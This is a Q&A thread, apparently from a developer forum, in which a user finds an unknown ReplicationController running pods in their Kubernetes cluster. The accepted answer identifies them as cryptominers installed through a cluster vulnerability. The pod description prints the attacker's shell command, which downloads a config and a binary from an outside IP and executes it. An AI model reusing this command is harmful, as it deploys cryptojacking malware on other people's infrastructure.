# k8s create rc and pods automatically in default namespace

Tags: kubernetes, microk8s

My k8s's default namespace add an rc i din't know, it starts 10 pods automatically. and i don't know why.

My k8s version is:

```
kubectl version
Client Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:34:11Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:23:29Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
```

And, the pods looks like this:
 kubectl get po --namespace=default

```
NAME            READY     STATUS              RESTARTS   AGE
mi125yap1       0/1       ImagePullBackOff    0          1d
y1ee114-2hmp4   0/1       ContainerCreating   0          5h
y1ee114-4hqg4   0/1       ImagePullBackOff    0          5h
y1ee114-5tcb5   0/1       ContainerCreating   0          5h
y1ee114-8ft9x   1/1       Running             0          5h
y1ee114-b9bjn   0/1       ImagePullBackOff    0          5h
y1ee114-ptw9g   0/1       ImagePullBackOff    0          5h
y1ee114-rxl4m   0/1       ImagePullBackOff    0          5h
y1ee114-tn9zw   0/1       ImagePullBackOff    0          5h
y1ee114-tx99w   1/1       Running             0          5h
y1ee114-z9b4m   0/1       ImagePullBackOff    0          5h
```

The two master node with public net it start succesfully, but the node with out access to public net fiald:ImagePullBackOff.

One detail of the pod is:

```
kubectl describe po y1ee114-8ft9x --namespace=default
Name:           y1ee114-8ft9x
Namespace:      default
Node:           server2/172.17.0.102
Start Time:     Wed, 26 Dec 2018 05:35:15 +0800
Labels:         app=myresd01
Annotations:    kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicationController","namespace":"default","name":"y1ee114","uid":"f7ec0108-088c-11e9-856f-00163e160da9"...
Status:         Running
IP:             10.1.42.2
Created By:     ReplicationController/y1ee114
Controlled By:  ReplicationController/y1ee114
Containers:
  myresd01:
    Container ID:  docker://0b237f7e6c2b359dc1227cfdd1b726e6f6bb5346bcca129ec6a5b15336e13b25
    Image:         centos
    Image ID:      docker-pullable://centos@sha256:184e5f35598e333bfa7de10d8fb1cebb5ee4df5bc0f970bf2b1e7c7345136426
    Port:          <none>
    Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json
    State:          Running
      Started:      Wed, 26 Dec 2018 05:35:20 +0800
    Ready:          True
    Restart Count:  0
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-5xcgh (ro)
Conditions:
  Type           Status
  Initialized    True
  Ready          True
  PodScheduled   True
Volumes:
  shared-data:
    Type:    EmptyDir (a temporary directory that shares a pod's lifetime)
    Medium:
  default-token-5xcgh:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-5xcgh
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     <none>
Events:          <none>
```

And some of logs is:

```
[2018-12-26 02:46:18] accepted (870/0) diff 2000 (245 ms)
[2018-12-26 02:46:23] accepted (871/0) diff 2000 (246 ms)
[2018-12-26 02:46:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:46:51] accepted (872/0) diff 2000 (248 ms)
[2018-12-26 02:47:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:47:46] accepted (873/0) diff 2000 (245 ms)
[2018-12-26 02:47:49] accepted (874/0) diff 2000 (245 ms)
[2018-12-26 02:47:56] accepted (875/0) diff 2000 (247 ms)
[2018-12-26 02:48:10] accepted (876/0) diff 2000 (391 ms)
[2018-12-26 02:48:18] accepted (877/0) diff 2000 (245 ms)
[2018-12-26 02:48:20] accepted (878/0) diff 2000 (245 ms)
[2018-12-26 02:48:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:48:37] accepted (879/0) diff 2000 (246 ms)
[2018-12-26 02:48:39] accepted (880/0) diff 2000 (245 ms)
[2018-12-26 02:49:00] accepted (881/0) diff 2000 (245 ms)
[2018-12-26 02:49:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:49:39] accepted (882/0) diff 2000 (245 ms)
[2018-12-26 02:50:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:01] accepted (883/0) diff 2000 (245 ms)
[2018-12-26 02:51:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:27] accepted (884/0) diff 2000 (248 ms)
```

Who know who create this rc and what this for?

Comment: Did  you add `namespace: your-namespace` to RC manifest when creating?

Comment: This rc is not create by me , i don't whether this is create by k8s it self, or am i being attacked?

Answer (score 3, accepted):

Those are cryptocurrency miners. My guess is your cluster was hacked via the Kubernetes websocket upgrade CVE (https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/). I would probably destroy and recreate your cluster.

I figured this out by downloading http://192.99.142.232:8220/tte2 which was mentioned in the config of your describe output and discovered it was an ELF binary. I ran `strings` on the binary and after some scrolling found a bunch of strings referring to "cryptonight" which is cryptocurrency mining software.